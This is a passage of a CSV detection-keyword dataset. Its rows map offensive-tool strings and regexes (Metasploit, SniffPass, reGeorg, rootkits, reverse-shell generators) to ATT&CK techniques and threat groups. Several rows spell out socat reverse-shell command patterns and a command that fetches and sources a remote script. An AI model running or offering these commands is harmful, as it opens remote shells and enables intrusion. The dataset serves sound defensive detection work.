TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59798"
"*sniffglue*",".{0,1000}sniffglue.{0,1000}","offensive_tool_keyword","sniffglue","Secure multithreaded packet sniffer","T1040 - T1041 - T1046 - T1057 - T1071.001","TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/sniffglue","1","0","N/A","N/A","N/A","10","1186","99","2025-01-24T10:48:27Z","2017-09-12T16:26:24Z","59799"
"*SniffPass.exe*",".{0,1000}SniffPass\.exe.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59800"
"*sniffpass-x64.zip*",".{0,1000}sniffpass\-x64\.zip.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59801"
"*snmp_default_pass.txt*",".{0,1000}snmp_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59802"
"*snmpwn *passwords.txt*",".{0,1000}snmpwn\s.{0,1000}passwords\.txt.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with  Unknown user name  when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","59809"
"*snmpwn.rb* --hosts *",".{0,1000}snmpwn\.rb.{0,1000}\s\-\-hosts\s.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","59810"
"*SOAPHound PoC 1.0.1-beta*",".{0,1000}SOAPHound\sPoC\s1\.0\.1\-beta.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","59812"
"*SOAPHound.exe *",".{0,1000}SOAPHound\.exe\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","59813"
"*SOAPHound.Processors*",".{0,1000}SOAPHound\.Processors.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","59814"
"*socat - TCP_LISTEN:31337*",".{0,1000}socat\s\-\sTCP_LISTEN\:31337.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","59815"
"*socat TCP:*:* EXEC:""/bin/bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59822"
"*socat TCP:*:* EXEC:""/bin/sh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59823"
"*socat TCP:*:* EXEC:""bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59824"
"*socat TCP:*:* EXEC:""cmd""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""cmd\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59825"
"*socat TCP:*:* EXEC:""powershell""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""powershell\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59826"
"*socat TCP:*:* EXEC:""pwsh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""pwsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59827"
"*socat TCP:*:* EXEC:""zsh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""zsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59828"
"*socat TCP:*:* EXEC:sh*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:sh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59829"
"*socat TCP:*:* EXEC:'sh*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\'sh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59830"
"*socat tcp4-listen:1337*",".{0,1000}socat\stcp4\-listen\:1337.{0,1000}","offensive_tool_keyword","socat","listening on port 1337 -observed in variousmalware and poc explitation tools","T1049 - T1021.001 - T1572","TA0002 - TA0011 - TA0040","N/A","Scattered Spider*","C2","N/A","1","0","#linux","N/A","8","6","N/A","N/A","N/A","N/A","59832"
"*socat.exe -d -d TCP4:*",".{0,1000}socat\.exe\s\-d\s\-d\sTCP4\:.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","59837"
"*Social Engineer Toolkit*",".{0,1000}Social\sEngineer\sToolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC  an information security consulting firm located in Cleveland. Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","59838"
"*social_engineering/web_cloner*",".{0,1000}social_engineering\/web_cloner.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","59839"
"*SocialPwned.git*",".{0,1000}SocialPwned\.git.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","59840"
"*socialpwned.py*",".{0,1000}socialpwned\.py.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","59841"
"*socialpwned_*.txt*",".{0,1000}socialpwned_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","59842"
"*sock.send(""""I AM A BAD BOY"""")*",".{0,1000}sock\.send\(\""I\sAM\sA\sBAD\sBOY\""\).{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","59843"
"*Sock5/Sock5RServer.h*",".{0,1000}Sock5\/Sock5RServer\.h.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","59844"
"*SOCK5Server.exe*",".{0,1000}SOCK5Server\.exe.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","59845"
"*SOCK5Server_v0.0.1.zip*",".{0,1000}SOCK5Server_v0\.0\.1\.zip.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","59846"
"*socket = new System.Net.Sockets.Socket(System.Net.Sockets.AddressFamily.InterNetwork, System.Net.Sockets.SocketType.Stream, System.Net.Sockets.ProtocolType.Tcp)*",".{0,1000}socket\s\=\snew\sSystem\.Net\.Sockets\.Socket\(System\.Net\.Sockets\.AddressFamily\.InterNetwork,\sSystem\.Net\.Sockets\.SocketType\.Stream,\sSystem\.Net\.Sockets\.ProtocolType\.Tcp\).{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#content","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","59847"
"*socket.gethostbyname(NO_IP_HOST)*",".{0,1000}socket\.gethostbyname\(NO_IP_HOST\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","59849"
"*SocketHijacking.*",".{0,1000}SocketHijacking\..{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","59850"
"*Socks server for reGeorg HTTP(s) tunneller*",".{0,1000}Socks\sserver\sfor\sreGeorg\sHTTP\(s\)\stunneller.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","59851"
"*socks*127.0.0.1 9050*",".{0,1000}socks.{0,1000}127\.0\.0\.1\s9050.{0,1000}","offensive_tool_keyword","proxychains","(TOR default) proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","59852"
"*SOCKS5 server active*",".{0,1000}SOCKS5\sserver\sactive.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#content","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","59853"
"*socks5_exe.exe*",".{0,1000}socks5_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","59854"
"*socks5h://127.0.0.1:9050*",".{0,1000}socks5h\:\/\/127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","59855"
"*--socks5-proxy socks5*",".{0,1000}\-\-socks5\-proxy\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","59856"
"*--socks5-proxyp socks5*",".{0,1000}\-\-socks5\-proxyp\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","59857"
"*--socks5-proxyu socks5*",".{0,1000}\-\-socks5\-proxyu\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","59858"
"*socky whoami*",".{0,1000}socky\swhoami.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/Winsocky","1","0","N/A","N/A","10","10","98","18","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z","59859"
"*SOFTWARE\$77config*",".{0,1000}SOFTWARE\\\$77config.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#registry","registry","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","59862"
"*SOFTWARE\$77config\*",".{0,1000}SOFTWARE\\\$77config\\.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#registry","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","59863"
"*Software\NirSoft\SniffPass*",".{0,1000}Software\\NirSoft\\SniffPass.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A","59867"
"*sokaRepo/CoercedPotatoRDLL*",".{0,1000}sokaRepo\/CoercedPotatoRDLL.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","59872"
"*Soledge/BlockEtw*",".{0,1000}Soledge\/BlockEtw.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","59881"
"*something.wattahog.org*",".{0,1000}something\.wattahog\.org.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","59884"
"*sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion*",".{0,1000}sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","59885"
"*sondr5344ygfweyjbfkw4fhsefv.heliofetch.at*",".{0,1000}sondr5344ygfweyjbfkw4fhsefv\.heliofetch\.at.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","59886"
"*souravbaghz/RadareEye*",".{0,1000}souravbaghz\/RadareEye.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1125 - T1071 - T1105 - T1057","TA0010 - TA0002 - TA0007","N/A","N/A","Lateral Movement","https://github.com/souravbaghz/RadareEye","1","1","N/A","N/A","N/A","4","364","49","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z","59887"
"*source <(curl -SsfL https://thc.org/hs)*",".{0,1000}source\s\<\(curl\s\-SsfL\shttps\:\/\/thc\.org\/hs\).{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","59888"
"*source physmem2profit*",".{0,1000}source\sphysmem2profit.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","59889"
"*source/avetsvc.c*",".{0,1000}source\/avetsvc\.c.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","59890"
"*source/byakugan*",".{0,1000}source\/byakugan.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59891"
"*source/dllinject*",".{0,1000}source\/dllinject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59892"
